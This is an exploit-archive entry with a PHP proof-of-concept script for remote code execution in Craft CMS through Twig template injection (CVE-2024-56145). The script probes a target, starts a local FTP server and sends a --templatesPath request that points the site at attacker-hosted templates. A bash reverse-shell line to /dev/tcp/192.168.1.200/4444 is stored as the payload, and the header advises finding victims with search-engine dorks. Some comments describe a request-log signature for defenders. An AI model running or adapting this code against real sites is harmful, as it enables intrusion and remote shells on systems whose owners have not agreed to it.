## https://sploitus.com/exploit?id=PACKETSTORM:189769
=============================================================================================================================================
    | # Title     : Craft CMS 3.9.14 Remote Command Execution vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com/docs/getting-started-tutorial/build/twig.html                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking In Google Or Other Search Engine.
    
    [+] Code Description:  exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to remote code execution.
    
        (Related : https://packetstorm.news/files/id/188825/ Related CVE numbers:	CVE-2024-56145 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 52
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Proof-of-concept driver for the Craft CMS issue described in the header above
     * (the advisory cites CVE-2024-56145).
     *
     * Every step is a plain HTTP GET whose query string carries CLI-style option names
     * (`--configPath`, `--templatesPath`); those names, and an `ftp://` value in the latter,
     * are the request-log signature a defender can search for in web-server access logs.
     */
    class Exploit {
        private $target;   // base URL of the target; query strings are appended to it verbatim
        private $ftp_host; // host advertised to the target inside the ftp:// templates path
        private $ftp_port; // port used both for the local pyftpdlib server and in the ftp:// URL
        private $payload;  // stored by the constructor but never read by any method of this class
        
        /**
         * Stores the four settings as given; no validation or normalisation is performed.
         */
        public function __construct($target, $ftp_host, $ftp_port, $payload) {
            $this->target = $target;
            $this->ftp_host = $ftp_host;
            $this->ftp_port = $ftp_port;
            $this->payload = $payload;
        }
        
        /**
         * Probes for the issue by requesting `?--configPath=/<random 8-hex nonce>` and
         * string-matching the response body.
         *
         * Returns true only when the body contains both the literal text 'mkdir()' and the
         * nonce — presumably a PHP warning that reflects the supplied path; the code itself
         * checks nothing beyond those two substrings. If file_get_contents() fails the
         * response is false, neither check matches, and false is returned, so the caller
         * cannot distinguish "not vulnerable" from "unreachable" (the warning is not caught).
         * Defender note: the detection depends entirely on a query-supplied path being
         * echoed back in error output; an instance that does not reflect it reads as "not vulnerable".
         */
        public function checkVulnerability() {
            $nonce = bin2hex(random_bytes(4)); // 8 hex chars, unique per probe
            $url = $this->target . '?--configPath=/' . $nonce;
            $response = file_get_contents($url);
            
            if (strpos($response, 'mkdir()') !== false && strpos($response, $nonce) !== false) {
                return true;
            }
            return false;
        }
        
        /**
         * Launches a local FTP server in the background via shell_exec().
         *
         * Requires python3 and the pyftpdlib module on the machine running this script.
         * The command is backgrounded with `&` and its output and exit status are discarded,
         * so a failed start is not detected here — execute() simply sleeps and continues.
         * $this->ftp_port is interpolated into the shell string without escapeshellarg().
         */
        public function startFTPServer() {
            $ftp_command = "python3 -m pyftpdlib -p {$this->ftp_port} &";
            shell_exec($ftp_command);
        }
        
        /**
         * Sends the templates-path request: `?--templatesPath=` with the URL-encoded value
         * `ftp://<ftp_host>:<ftp_port>`. The response is discarded, so this method reports
         * nothing about whether the target actually made an outbound FTP connection.
         */
        public function triggerExploit() {
            $templatesPath = "ftp://{$this->ftp_host}:{$this->ftp_port}";
            $url = $this->target . "?--templatesPath=" . urlencode($templatesPath);
            file_get_contents($url);
        }
        
        /**
         * Orchestrates the run: probe, start the FTP server, wait, send the trigger request.
         *
         * Progress is printed to stdout. "Exploit triggered successfully" only means the
         * second request was sent; no method here verifies any effect on the target.
         */
        public function execute() {
            if ($this->checkVulnerability()) {
                echo "[+] Target is vulnerable. Starting exploit...\n";
                $this->startFTPServer();
                sleep(2); // Allow FTP server to start (fixed delay; the server is never actually polled)
                $this->triggerExploit();
                echo "[+] Exploit triggered successfully.\n";
            } else {
                echo "[-] Target is not vulnerable.\n";
            }
        }
    }
    
    // Example Usage — placeholder values; edit these before running.
    $target = "http://example.com";    // base URL; Exploit appends the query strings directly to it
    $ftp_host = "192.168.1.100";       // host the target is told to fetch templates from (ftp://)
    $ftp_port = 2121;                  // passed unescaped into the shell command in startFTPServer()
    $payload = "bash -c 'bash -i >& /dev/tcp/192.168.1.200/4444 0>&1'"; // handed to the constructor but never used by any Exploit method
    
    $exploit = new Exploit($target, $ftp_host, $ftp_port, $payload);
    $exploit->execute(); // probe first; only on a match does it start the FTP server and send the trigger
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================